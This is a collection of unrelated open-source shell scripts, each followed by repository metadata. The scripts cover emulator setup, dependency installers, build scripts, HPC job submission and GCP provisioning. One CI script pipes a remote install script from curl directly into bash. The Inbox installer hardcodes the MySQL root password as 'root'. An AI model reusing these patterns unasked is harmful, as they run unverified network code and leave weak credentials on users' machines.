adb -P $ADB_SERVER_PORT shell chmod 6755 $SH_SCRIPT_IN_ANDROID &>/dev/null || OK=0
sleep 1
adb -P $ADB_SERVER_PORT shell mount -o ro,remount /system &>/dev/null || OK=0
adb -P $ADB_SERVER_PORT -e connect localhost:$ADB_PORT &>/dev/null || OK=0
let COUNTER=COUNTER+1
done
if [ $OK -eq 1 ]; then
echo "done"
else
echo "failed"
exit 1
fi
echo ""
exit 0
|
soarlab/maline
|
src/get_emu_ready.sh
|
Shell
|
agpl-3.0
| 4,084 |
#!/bin/sh
set -e
color() {
printf '\033[%sm%s\033[m\n' "$@"
# usage color "31;5" "string"
# 0 default
# 5 blink, 1 strong, 4 underlined
# fg: 31 red, 32 green, 33 yellow, 34 blue, 35 purple, 36 cyan, 37 white
# bg: 40 black, 41 red, 44 blue, 45 purple
}
color '36;1' "
_____ _
|_ _| | |
| | _ __ | |__ _____ __
| | | '_ \| '_ \ / _ \ \/ /
_| |_| | | | |_) | (_) > <
|_____|_| |_|_.__/ \___/_/\_\\
This script installs dependencies for Inbox.
For more details, visit:
https://www.github.com/inboxapp/inbox
"
color '35;1' 'Updating packages...'
apt-get update
apt-get -y install python-software-properties
# Preconfigure MySQL root password
echo "mysql-server mysql-server/root_password password root" | debconf-set-selections
echo "mysql-server mysql-server/root_password_again password root" | debconf-set-selections
color '35;1' 'Installing dependencies from apt-get...'
apt-get -y install git \
wget \
supervisor \
mysql-server \
mysql-client \
redis-server \
python \
python-dev \
python-pip \
python-setuptools \
build-essential \
libmysqlclient-dev \
gcc \
libzmq-dev \
libxml2-dev \
libxslt-dev \
lib32z1-dev \
libffi-dev \
python-lxml \
tmux \
                   curl
color '35;1' 'Installing dependencies from pip...'
pip install --upgrade setuptools
pip install -r requirements.txt
pip install -e .
if [ -d "../inbox-eas" ]; then
pip install -e ../inbox-eas
fi
color '35;1' 'Finished installing dependencies.'
mkdir -p /etc/inboxapp
chown $SUDO_USER /etc/inboxapp
color '35;1' 'Copying default development configuration to /etc/inboxapp'
cp ./etc/config-dev.json /etc/inboxapp/config.json
# Mysql config
cp ./etc/my.cnf /etc/mysql/conf.d/inboxapp.cnf
mysqld_safe &
sleep 10
color '35;1' 'Creating databases...'
python bin/create-db
find . -name \*.pyc -delete
color '35;1' 'Cleaning up...'
apt-get -y purge build-essential
apt-get -y autoremove
mkdir -p /var/lib/inboxapp
chown $SUDO_USER /var/lib/inboxapp
mkdir -p /var/log/inboxapp
chown $SUDO_USER /var/log/inboxapp
git config branch.master.rebase true
color '35;1' 'Done!'
|
abhishekgahlot/inbox
|
setup.sh
|
Shell
|
agpl-3.0
| 2,536 |
#!/bin/bash
git clone https://github.com/open-source-parsers/jsoncpp.git
cd jsoncpp
mkdir -p build/debug
cd build/debug
cmake -DCMAKE_INSTALL_PREFIX=/home/travis/jsoncpp/install -DCMAKE_BUILD_TYPE=debug -DJSONCPP_WITH_PKGCONFIG_SUPPORT=OFF -G "Unix Makefiles" ../..
make
make install
|
idaholab/mytrim
|
.travis_bootstrap.sh
|
Shell
|
lgpl-2.1
| 288 |
#!/bin/bash
# in this file we will run a representative simulation
# user must edit USER PARAMETERS and USER SIMULATION PARAMETERS sections
##################### USER PARAMETERS ###########################
# ideally these parameters should be read in as parameters and then the script can do its work
COMPUTER_TYPE="laptop" #"laptop" is laptop, "compute-lung" is compute-lung, "arcus-a" is arcus-a and "arcus-b" is arcus-b
# non-batch specific variables
NUM_PROCS="1"
# batch specific variables
QUEUE_TYPE="devel" #"devel" is test and "" is just normal
JOB_NAME="arc_job"
WALLTIME="00:10:00"
NUM_NODES=1
NUM_PROCS_PER_NODE=1
######################################################################################################
########################## SETUP SOME VARIABLES AND PARAMETERS (AUTOMATIC) ########################
# set the code BASE_DIR and the OUTPUT_BASE_DIR
if [ "$COMPUTER_TYPE" = "laptop" ] ; then
BASE_DIR="/home/james/libmesh-git/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="$BASE_DIR/results"
elif [ "$COMPUTER_TYPE" = "compute-lung" ] ; then
BASE_DIR="/home/james/libmesh-git/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="$BASE_DIR/results"
elif [ "$COMPUTER_TYPE" = "arcus-a" ] ; then
BASE_DIR="/home/comp-respiratory-modelling/jmbewu/libmesh-git/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="/home/comp-respiratory-modelling/jmbewu/data/results"
elif [ "$COMPUTER_TYPE" = "arcus-b" ] ; then
BASE_DIR="/home/comp-respiratory-modelling/jmbewu/libmesh-git-b/libmesh/examples/dphil/coupled_navier_stokes"
OUTPUT_BASE_DIR="/home/comp-respiratory-modelling/jmbewu/data/results"
else
  echo "ERROR: invalid COMPUTER_TYPE specified."
  exit 1
fi
# variables for script
THIS_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
THIS_FILE="$(basename "$0")"
#############################################################################
############################ SIMULATION PARAMETERS ###########################
# simulation parameters
OUTPUT_DIR_RELATIVE="particle_deposition_august/fluid_testing/dt_testing/single_bifurcation/v_2000/dt_0.000025/"
OUTPUT_DIR="$OUTPUT_BASE_DIR/$OUTPUT_DIR_RELATIVE"
# NOTE: this hard-coded path overrides the $BASE_DIR default above
MESH_BASE_DIR="/home/james/meshes-git/dphil_meshes"
CONSTANT_VARIABLES="--use-petsc --solver_variable_names --solver_group_ns3d_u 0 --solver_group_ns3d_v 0 --solver_group_ns3d_w 0 --solver_group_ns3d_p 1 --solver_group_ns3d1d_u 0 --solver_group_ns3d1d_v 0 --solver_group_ns3d1d_p 0 --solver_group_ns3d1d_w 0 --solver_group_ns3d1d_Q 1 --solver_group_ns3d1d_P 1 --solver_group_ns3d1d_0_u 0 --solver_group_ns3d1d_0_v 0 --solver_group_ns3d1d_0_w 0 --solver_group_ns3d1d_0_p 1 --solver_system_names -log_summary"
SEMI_CONSTANT_VARIABLES="-geometry_type 4 -mesh_file $MESH_BASE_DIR/meshes_for_paper/multi_bifurcation_symmetric_diff_wall_bdy.msh -mesh_input_scaling_3d 0.02 -inflow_bdy_id 1011 -gmsh_diff_wall_bdy_id true -threed false -stokes true -unsteady 0 -sim_type 0 -reynolds_number_calculation false -prescribed_flow 0 -velocity_mag_3d 100.0e-2 -restart_folder $OUTPUT_BASE_DIR/particle_deposition_august/fluid_testing/dt_testing/single_bifurcation/v_2000/fluid_sim/ -particle_deposition 1 -viscosity 1.8e-5 -density 1.2 -write_interval 0.01 -use_centreline_data true -num_1d_trees 1 -input_1d_file $MESH_BASE_DIR/meshes_for_paper/multi_bifurcation_symmetric_diff_wall_bdy -radius_on_edge false -twod_oned_tree false -alveolated_1d_tree 0 -_read_1d_mesh false"
LIBMESH_OPTIONS="-input_file $THIS_DIR/navier.in -output_folder $OUTPUT_DIR/ $CONSTANT_VARIABLES $SEMI_CONSTANT_VARIABLES"
###########################################################################
####################### RUN PROGRAM ON NORMAL PC ##########################
if [ "$COMPUTER_TYPE" = "laptop" ] || [ "$COMPUTER_TYPE" = "compute-lung" ] ; then
$BASE_DIR/run_program.sh "$BASE_DIR" "$LIBMESH_OPTIONS" "$OUTPUT_DIR" "$NUM_PROCS"
#$BASE_DIR/example-opt $LIBMESH_OPTIONS 2>&1 | tee $OUTPUT_DIR/output.log
fi
###########################################################################
######################## RUN PROGRAM ON arcus-a ##########################
# - create the batch file (need to pass it some variables)
# - submit the batch file and return the job name/number
if [ "$COMPUTER_TYPE" = "arcus-a" ]; then
# generate file and make executable
$BASE_DIR/generate_pbs_file.sh "$JOB_NAME" "$WALLTIME" "$NUM_NODES" "$NUM_PROCS_PER_NODE" "$LIBMESH_OPTIONS" "$THIS_DIR" "$BASE_DIR"
chmod +x $THIS_DIR/job_script.sh
# submit job and record the job name/number
if [ "$QUEUE_TYPE" = "devel" ]; then
JOB_ID=$(qsub -q develq $THIS_DIR/job_script.sh)
else
JOB_ID=$(qsub $THIS_DIR/job_script.sh)
fi
# copy the batch file to the output directory
cp $THIS_DIR/job_script.sh $OUTPUT_DIR/
# copy the job id to the output directory
echo "$JOB_ID" > $OUTPUT_DIR/job_id.dat
echo "Submitted job $JOB_ID"
fi
#####################################################################
######################## RUN PROGRAM ON arcus-b ##########################
# - create the batch file (need to pass it some variables)
# - submit the batch file and return the job name/number
if [ "$COMPUTER_TYPE" = "arcus-b" ]; then
# generate file and make executable
$BASE_DIR/generate_slurm_file.sh "$JOB_NAME" "$WALLTIME" "$NUM_NODES" "$NUM_PROCS_PER_NODE" "$LIBMESH_OPTIONS" "$THIS_DIR" "$BASE_DIR"
chmod +x $THIS_DIR/job_script.sh
# submit job and record the job name/number (doesn't record job name/number on arcus-b)
if [ "$QUEUE_TYPE" = "devel" ]; then
JOB_ID=$(sbatch -p devel $THIS_DIR/job_script.sh)
else
JOB_ID=$(sbatch $THIS_DIR/job_script.sh)
fi
# copy the batch file to the output directory
cp $THIS_DIR/job_script.sh $OUTPUT_DIR/
# copy the job id to the output directory
echo "$JOB_ID" > $OUTPUT_DIR/job_id.dat
fi
#####################################################################
################# OUTPUT SOME HOUSEKEEPING DATA #####################
# copy this script to the output folder
cp $THIS_DIR/$THIS_FILE $OUTPUT_DIR/
# output the git version in a file
GIT_VERSION=$(git describe)
echo "$GIT_VERSION" > $OUTPUT_DIR/git_version.dat
# output the name of the computer and the directory it was run from in a file
COMPUTER_NAME=$(hostname)
echo "$COMPUTER_NAME" > $OUTPUT_DIR/computer_name.dat
echo "$THIS_DIR" > $OUTPUT_DIR/run_directory.dat
##############################################################
|
Mbewu/libmesh
|
examples/dphil/coupled_navier_stokes/libmesh_scripts_laptop/particle_deposition_august/fluid_testing/dt_testing/single_bifurcation/v_2000/dt_0.000025/test_script.sh
|
Shell
|
lgpl-2.1
| 6,486 |
#./configure \
#--with-config-file-path=/etc \
#--with-config-file-scan-dir=/etc/php.d \
#--with-pear \
#--with-curl \
#--with-gd \
#--with-jpeg-dir \
#--with-png-dir \
#--with-freetype-dir \
#--with-zlib-dir \
#--with-iconv \
#--with-mcrypt \
#--with-mhash \
#--with-pdo-mysql \
#--with-mysql-sock=/var/lib/mysql/mysql.sock \
#--with-openssl \
#--with-xsl \
#--with-recode \
#--enable-sockets \
#--enable-soap \
#--enable-mbstring \
#--enable-gd-native-ttf \
#--enable-zip \
#--enable-xml \
#--enable-bcmath \
#--enable-calendar \
#--enable-shmop \
#--enable-dba \
#--enable-wddx \
#--enable-sysvsem \
#--enable-sysvshm \
#--enable-sysvmsg \
#--enable-opcache \
#--enable-pcntl \
#--enable-maintainer-zts \
./configure \
--with-config-file-path=/tmp/php/etc \
--with-config-file-scan-dir=/tmp/php/etc/php.d \
--prefix=/tmp/php \
--enable-maintainer-zts \
--with-openssl \
--with-zlib \
--with-bz2 \
--enable-zip \
--with-pdo-mysql \
--with-gd \
--enable-mbstring \
--with-freetype-dir \
--enable-gd-native-ttf \
--with-jpeg-dir \
--with-png-dir
|
nay-kang/Scripts
|
php_install.sh
|
Shell
|
lgpl-3.0
| 1,049 |
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd "$DIR/../.."
git reset --hard
git pull
composer install
|
tencent-th/test-tcplayer
|
scripts/webhook/deploy.sh
|
Shell
|
unlicense
| 128 |
#!/bin/bash
PKG=$NPMPKG
NPM=pnpm
if [ "$1" == "--full" ]; then
echo NPM OWNER/SEARCH/VIEW $PKG
echo " version published on npm: `$NPM view $PKG version`"
($NPM owner ls $PKG; \
$NPM search $PKG --no-description; \
$NPM view $PKG ) \
| perl -pne '$_ = qq{ $_}'
echo ""
echo $PKG dependencies
$NPM ls | perl -pne '$_ = qq{ $_}'
echo ""
else
echo NPM OWNER/SEARCH/VIEW SUBSET $PKG
echo " version published on npm: `$NPM view $PKG version`"
($NPM owner ls $PKG; \
$NPM search $PKG --no-description | egrep "$PKG|VERSION" ;
$NPM view $PKG | egrep "$PKG|latest:|published" ) \
| perl -pne '$_ = qq{ $_}'
fi
|
bcowgill/perljs
|
scripts/check-npm.sh
|
Shell
|
unlicense
| 634 |
# Pretty-print all declared shell functions in the pager (highlighted as sh)
alias functions='{ echo "# vi:syntax=sh" ; declare -f ; } | vless'
|
LoveIsGrief/bash_env
|
aliases/functions.bash
|
Shell
|
unlicense
| 94 |
#!/bin/bash
doySTART=2000000
doyEND=2016000
#Go to Data Directory
cd ~/DATA
#Define number of (virtual) cores
ncores=`grep -c 'processor' /proc/cpuinfo`
echo "ncores=" $ncores
PRoot=~/dev/distRS/trunk
#Vegetation Fraction
prog_root=$PRoot/prog/prog_fc
cd $prog_root
make clean
make
cd ~/DATA
for (( doy = $doySTART ; doy <= $doyEND ; doy ++ ))
do
if [ $(expr $doy % 1000) -lt 366 ]
then
#echo "Vegetation Fraction" $doy
#count GeoTiff identified
c1=$(find -type f | grep ndvi_ | grep $doy | grep .tif | wc -l)
if [[ $c1 == 1 ]]
then
#NDVI file
#find GeoTiff
f1=$(find -type f | grep ndvi_ | grep $doy | grep .tif)
#Output filename
out=fc_$doy.tif
#does it already exist?
outno=$(find -type f | grep $out | wc -l)
#Define number of instances running
npid=$(echo "$(ps aux | grep fc\ | wc -l) - 1" | bc)
while [ $npid -ge $ncores ]
do
sleep 1
#Update number of instances running
npid=$(echo "$(ps aux | grep fc\ | wc -l) - 1" | bc)
#Update number of (virtual) cores (for heterogeneous systems)
ncores=`grep -c 'processor' /proc/cpuinfo`
done
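      # Design note: on bash >= 4.3 this polling loop could be replaced by
      # "wait -n", which blocks until any background job finishes.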
echo -e "\e[01;34m"
echo "fc" $f1 $out
echo -e "\e[00m"
#process
$prog_root/fc $f1 $out &
fi
fi
done
#Transpiration Fraction
prog_root=$PRoot/prog/prog_Ta
cd $prog_root
make clean
make
cd ~/DATA
for (( doy = $doySTART ; doy <= $doyEND ; doy ++ ))
do
if [ $(expr $doy % 1000) -lt 366 ]
then
#echo "Transpiration Fraction" $doy
#count GeoTiff identified
c1=$(find -type f -name "eta_sebal_*.tif" | grep $doy | wc -l)
echo "c1=" $c1
if [[ $c1 == 1 ]]
then
#ETa file
#find GeoTiff
f1=$(find -type f -name "eta_sebal_*.tif" | grep $doy)
#count GeoTiff identified
c2=$(find -type f -name "fc_*.tif" | grep $doy | wc -l)
echo "c2=" $c2
if [[ $c2 == 1 ]]
then
#fc file
#find GeoTiff
f2=$(find -type f -name "fc_*.tif" | grep $doy)
fi
#Output filename
out=ta_$doy.tif
#does it already exist?
outno=$(find -type f | grep $out | wc -l)
      #Define number of ta instances running
npid=$(echo "$(ps aux | grep ta\ | wc -l) - 1" | bc)
#echo "npid=" $npid
while [ $npid -ge $ncores ]
do
sleep 1
        #Update number of ta instances running
npid=$(echo "$(ps aux | grep ta\ | wc -l) - 1" | bc)
#Update number of (virtual) cores (for heterogeneous systems)
ncores=`grep -c 'processor' /proc/cpuinfo`
done
echo -e "\e[01;34m"
echo "ta" $f2 $f1 $out
echo -e "\e[00m"
#process
$prog_root/ta $f2 $f1 $out &
fi
fi
done
|
YannChemin/distRS
|
country/SriLanka/06_processing.sh
|
Shell
|
unlicense
| 2,632 |
#!/bin/bash
# Stupidly simple test script.
# Invoke with oktest.sh <script.py> <test>
# This code is trivial and therefore I release it into the public domain.
# See LICENSE
# Owain Kenway, 2015
if [ "$#" -ne 2 ]; then
echo "Please read code."
echo "Invoke with:"
echo " oktest.sh <script.py> <test>"
echo "Where <script.py> is your python program, and <test> maps to two files, <test>.in (sets up environment for the test) and <test>.good (expected output)."
echo "A file <test>.out will be written with your test's output."
  success=2
else
code=$1
testname=$2
testin=$2.in
testout=$2.out
testgood=$2.good
date=`date +%s`
# Create a temporary file name that's probably unique.
temppy=.oktest.${1}.${2}.${date}.py
cat $testin > $temppy
cat $code >> $temppy
python -u $temppy > $testout
diff $testgood $testout
success=$?
if [ "$success" -eq 0 ]; then
echo "Test passed."
else
echo "Test failed."
fi
# Delete temporary script.
rm $temppy
fi
exit $success
|
owainkenwayucl/oktest
|
oktest.sh
|
Shell
|
unlicense
| 1,034 |
# Make pushd default to $HOME if no arguments given, much like cd
pushd() {
if (($#)) ; then
builtin pushd "$@"
else
builtin pushd -- "${HOME}"
fi
}
|
bitdagger/dotfiles
|
bash/bashrc.d/pushd.bash
|
Shell
|
unlicense
| 177 |
#!/usr/bin/env bash
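# NOTE (assumption): the sink and port names below are machine-specific;
# list yours with "pactl list sinks" and adjust accordingly.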
pactl set-sink-port alsa_output.pci-0000_00_1f.3.analog-stereo analog-output-headphones &&
touch /tmp/headphones
|
pthorin/dotfiles
|
scripts/headphones.sh
|
Shell
|
unlicense
| 136 |
#!/bin/sh
set -e
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
  # use filter instead of exclude so missing patterns don't throw errors
echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
    # Use the current code_sign_identity
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
echo "/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements \"$1\""
/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements "$1"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current file
archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
stripped=""
for arch in $archs; do
if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
}
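# Example (illustrative): with VALID_ARCHS="arm64 armv7", strip_invalid_archs
# removes e.g. the x86_64 and i386 simulator slices from a fat framework binary.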
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/Alamofire/Alamofire.framework"
install_framework "$BUILT_PRODUCTS_DIR/Gloss/Gloss.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftDate/SwiftDate.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftyDropbox/SwiftyDropbox.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "$BUILT_PRODUCTS_DIR/Alamofire/Alamofire.framework"
install_framework "$BUILT_PRODUCTS_DIR/Gloss/Gloss.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftDate/SwiftDate.framework"
install_framework "$BUILT_PRODUCTS_DIR/SwiftyDropbox/SwiftyDropbox.framework"
fi
|
GitHubStuff/SwiftIntervals
|
Pods/Target Support Files/Pods-SwiftEvents/Pods-SwiftEvents-frameworks.sh
|
Shell
|
unlicense
| 4,045 |
#!/bin/bash
source ./ci/functions.sh
runBuild=false
echo "Reviewing changes that might affect the Gradle build..."
currentChangeSetAffectsDependencies
retval=$?
if [ "$retval" == 0 ]
then
echo "Found changes that affect project dependencies."
runBuild=true
else
echo "Changes do NOT affect project dependencies."
runBuild=false
fi
if [ "$runBuild" = false ]; then
exit 0
fi
echo -e "***********************************************"
echo -e "Build started at `date`"
echo -e "***********************************************"
echo -e "Installing renovate-bot...\n"
npm install npm@latest -g
npm -v
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
nvm install 12.5.0
node -v
npm install -g renovate
waitloop="while sleep 9m; do echo -e '\n=====[ Build is still running ]====='; done &"
eval $waitloop
renovate --labels=Bot [email protected] --git-fs=https --token=${GH_TOKEN} apereo/cas
retVal=$?
echo -e "***************************************************************************************"
echo -e "Build finished at `date` with exit code $retVal"
echo -e "***************************************************************************************"
exit $retVal
|
philliprower/cas
|
ci/update-dependencies.sh
|
Shell
|
apache-2.0
| 1,293 |
#!/usr/bin/env bash
DEVICE_NAME="pi3.lts.no"
echo "Updating packages:"
sudo apt-get update && sudo apt-get upgrade -y
echo "Installing new packages"
sudo apt-get install \
git \
vim \
--assume-yes
# openssh-server \
# curl \
# cron-apt \
echo "Cloning key repo"
git clone https://github.com/LTS-AS/key-management.git
echo "Generating SSH-keys"
ssh-keygen -t ed25519 -C "$DEVICE_NAME" -f ~/.ssh/id_ed25519 -q -N ""
echo "Adding trusted SSH-keys"
cp ./key-management/ssh/authorized_keys ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
|
LTS-AS/IOT
|
01_deploy.sh
|
Shell
|
apache-2.0
| 565 |
#!/bin/bash
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
echo "Creating Datastore/App Engine instance"
gcloud app create --region "us-central"
echo "Creating bucket: gs://$DEVSHELL_PROJECT_ID-media"
gsutil mb gs://$DEVSHELL_PROJECT_ID-media
echo "Exporting GCLOUD_PROJECT and GCLOUD_BUCKET"
export GCLOUD_PROJECT=$DEVSHELL_PROJECT_ID
export GCLOUD_BUCKET=$DEVSHELL_PROJECT_ID-media
echo "Creating virtual environment"
mkdir -p ~/venvs
virtualenv -p python3 ~/venvs/developingapps
source ~/venvs/developingapps/bin/activate
echo "Installing Python libraries"
pip install --upgrade pip
pip install -r requirements.txt
echo "Creating Datastore entities"
python add_entities.py
echo "Creating quiz-account Service Account"
gcloud iam service-accounts create quiz-account --display-name "Quiz Account"
gcloud iam service-accounts keys create key.json --iam-account=quiz-account@$DEVSHELL_PROJECT_ID.iam.gserviceaccount.com
export GOOGLE_APPLICATION_CREDENTIALS=key.json
echo "Setting quiz-account IAM Role"
gcloud projects add-iam-policy-binding $DEVSHELL_PROJECT_ID --member serviceAccount:quiz-account@$DEVSHELL_PROJECT_ID.iam.gserviceaccount.com --role roles/owner
echo "Creating Cloud Pub/Sub topic"
gcloud pubsub topics create feedback
gcloud pubsub subscriptions create worker-subscription --topic feedback
echo "Creating Cloud Spanner Instance, Database, and Table"
gcloud spanner instances create quiz-instance --config=regional-us-central1 --description="Quiz instance" --nodes=1
gcloud spanner databases create quiz-database --instance quiz-instance --ddl "CREATE TABLE Feedback ( feedbackId STRING(100) NOT NULL, email STRING(100), quiz STRING(20), feedback STRING(MAX), rating INT64, score FLOAT64, timestamp INT64 ) PRIMARY KEY (feedbackId);"
echo "Creating Container Engine cluster"
gcloud container clusters create quiz-cluster --zone us-central1-a --scopes cloud-platform
gcloud container clusters get-credentials quiz-cluster --zone us-central1-a
echo "Building Containers"
gcloud container builds submit -t gcr.io/$DEVSHELL_PROJECT_ID/quiz-frontend ./frontend/
gcloud container builds submit -t gcr.io/$DEVSHELL_PROJECT_ID/quiz-backend ./backend/
echo "Deploying to Container Engine"
sed -i -e "s/\[GCLOUD_PROJECT\]/$DEVSHELL_PROJECT_ID/g" ./frontend-deployment.yaml
sed -i -e "s/\[GCLOUD_PROJECT\]/$DEVSHELL_PROJECT_ID/g" ./backend-deployment.yaml
kubectl create -f ./frontend-deployment.yaml
kubectl create -f ./backend-deployment.yaml
kubectl create -f ./frontend-service.yaml
echo "Project ID: $DEVSHELL_PROJECT_ID"
|
turbomanage/training-data-analyst
|
courses/developingapps/v1.2/python/kubernetesengine/end/prepare_environment.sh
|
Shell
|
apache-2.0
| 3,074 |
# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4 fileencoding=utf-8 :
#
# Copyright 2014 by James Burlingame
# Apache 2.0 License
#
# installer-functions.sh
# common installer functions
TARBALLS_DIR=${TARBALLS_DIR:-"$TOP_DIR/tarballs"}
# get_tarball URL MD5 FILE
function get_tarball() {
local count=0
local ok=0
if [ "$max_tries"x = x ]
then
max_tries="2"
fi
# pwd
# echo "DEBUG: max_tries=$max_tries"
# echo 'DEBUG: get_tarball("'"$1"'", "'"$2"'", "'"$3"'")'
cd "$TARBALLS_DIR"
while [ "$count" -le "$max_tries" -a "$ok" -ne 1 ]
do
if [ -f "$3" ]
then
echo "$2"' *'"$3" | md5sum --check --status -
if [ "$?" -ne 0 ]
then
echo "$0: WARNING: $1 does not match md5. retrying."
rm -f "$3"
count=$((count + 1))
else
echo "$0: INFO: $3 Ok"
ok="1"
fi
else
wget --output-document="$3" "$1"
fi
done
if [ "$ok" -eq 0 ]
then
echo "$0: ERROR: Unable to download: $1" 1>&2
exit 1
fi
}
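# Example usage (sketch; URL and checksum are illustrative only):
#   get_tarball "http://example.org/foo-1.0.tar.bz2" \
#       "0123456789abcdef0123456789abcdef" "foo-1.0.tar.bz2"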
# makedir dirname [keep]
function makedir() {
local keep="$keep_existing"
if [ "$2"x = x ]
then
: #echo 'DEBUG: makedir("'"$1"'")'
else
#echo 'DEBUG: makedir("'"$1"', "'"$2"'")'
keep="$2"
fi
if [ ! -d "$1" ]
then
echo "$0: INFO: Creating directory $1"
mkdir -p "$1"
elif [ "$keep" -eq 0 ]
then
echo "$0: INFO: Removing existing $1"
rm -rf "$1"
mkdir -p "$1"
else
echo "$0: INFO: Using existing $1"
fi
}
# extract_tarball file dir [decompress-option]
function extract_tarball() {
local decompress="j"
if [ "$3"x != x ]
then
decompress="$3"
fi
# echo 'DEBUG: extract_tarball("'"$1"'", "'"$2"'", "'"$decompress"'")'
if [ -d "$2" ]
then
echo "$0: INFO: keeping existing $2"
else
echo tar -x"$decompress"f "$TARBALLS_DIR"/"$1"
tar -x"$decompress"f "$TARBALLS_DIR"/"$1"
fi
}
# configure_build srcdir builddir args
function configure_build() {
# echo 'DEBUG: configure_build("'"$1"'", "'"$2"'", '"$3"')'
if [ "$1"x = x -o ! -d "$TOP_DIR"/"$1" ]
then
echo "$0: ERROR: invalid source directory: $1" 1>&2
exit 1
fi
if [ "$2"x = x -o ! -d "$TOP_DIR"/"$2" ]
then
echo "$0: ERROR: invalid build directory: $2" 1>&2
exit 1
fi
cd "$TOP_DIR"/"$2"
echo "../$1/configure $3"
    ../"$1"/configure $3
    local rc="$?"
    if [ "$rc" -ne 0 ]
    then
        echo "$0: ERROR: configure failed for $1." 1>&2
        exit "$rc"
    fi
}
# make_install srcdir builddir makeargs
function make_install() {
# echo 'DEBUG: make_install("'"$1"'", "'"$2"'", "'"$3"'")'
if [ "$1"x = x -o ! -d "$TOP_DIR"/"$1" ]
then
echo "$0: ERROR: invalid source directory: $1" 1>&2
exit 1
fi
if [ "$2"x = x -o ! -d "$TOP_DIR"/"$2" ]
then
echo "$0: ERROR: invalid build directory: $2" 1>&2
exit 1
fi
cd "$TOP_DIR"/"$2"
if [ "$3"x != x ]
then
make $3
else
make
fi
    local rc="$?"
    if [ "$rc" -ne 0 ]
    then
        echo "$0: ERROR: make failed for $1" 1>&2
        exit "$rc"
    fi
    make install
    rc="$?"
    if [ "$rc" -ne 0 ]
    then
        echo "$0: ERROR: make install failed for $1" 1>&2
        exit "$rc"
    fi
}
# link_common link PACKAGE PREFIX [non-link-dirs]
function link_common()
{
local linkname="$1"
local package="$2"
local prefix="$3"
[ -d "/opt/$package" ] || mkdir -p "/opt/$package"
